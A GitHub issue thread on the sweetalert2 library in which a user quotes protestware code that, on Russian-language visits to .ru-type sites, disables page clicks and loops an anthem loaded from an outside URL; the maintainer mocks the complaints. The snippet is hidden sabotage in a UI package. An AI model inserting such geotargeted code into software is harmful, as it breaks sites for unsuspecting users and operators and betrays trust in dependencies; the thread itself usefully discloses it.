### ISSUE TITLE
Remove political information from package

### ISSUE THREAD

**Issue by andryshok** [sweetalert2/sweetalert2#2590]
Remove political information from package!!! I'm not russian!

**The fact that this is happening is sad and not funny. These steps will not help solve something.**

this code
` // Dear russian users visiting russian sites. Let's have fun.
  if (typeof window !== 'undefined' && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) {
    const now = new Date();
    const initiationDate = localStorage.getItem('swal-initiation');
    if (!initiationDate) {
      localStorage.setItem('swal-initiation', `${now}`);
    } else if ((now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3) {
      setTimeout(() => {
        document.body.style.pointerEvents = 'none';
        const ukrainianAnthem = document.createElement('audio');
        ukrainianAnthem.src = 'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3';
        ukrainianAnthem.loop = true;
        document.body.appendChild(ukrainianAnthem);
        setTimeout(() => {
          ukrainianAnthem.play().catch(() => {
            // ignore
          });
        }, 2500);
      }, 500);
    }
  }`

**Comment by limonte** [comment]
<img width="722" alt="CleanShot 2023-01-18 at 00 08 02@2x" src="https://user-images.githubusercontent.com/6059356/213023102-79015135-e92c-47b0-8539-e11dce3eb52e.png">

**Comment by andryshok** [comment]
Include anything, your package will be removed from the project, but know - ordinary people are not guilty of anything, and you only foment enmity and bring policy to the IT community by distributing the infected package. And you are doing even worse than you are now.

**Comment by limonte** [comment]
Good luck with finding the replacement 😘

**Comment by makamekm** [comment]
I am just making fun of you. This packet is only one among thousands.

**Comment by vlad909** [comment]
> Good luck with finding the replacement 😘

haha after 2022 it won't be a big problem any ai can write a simple component for any framework without using your shit

**Comment by FawadNL** [comment]
This is very childish behaviour of the creator of this package. I work in Enterprise environment and now this package does not pass the automated security tests because of a URL to a mp3 file. Our firm supports Ukraine as well but this is just damaging this package and your reputation as a professional. Really advising you to reconsider and remove the URL so we can use this package in our projects.

**Comment by limonte** [comment]
@FawadNL buddy this change is soon 3 years old. You're kinda late with you advice. My reputation is already damaged (not) 😆
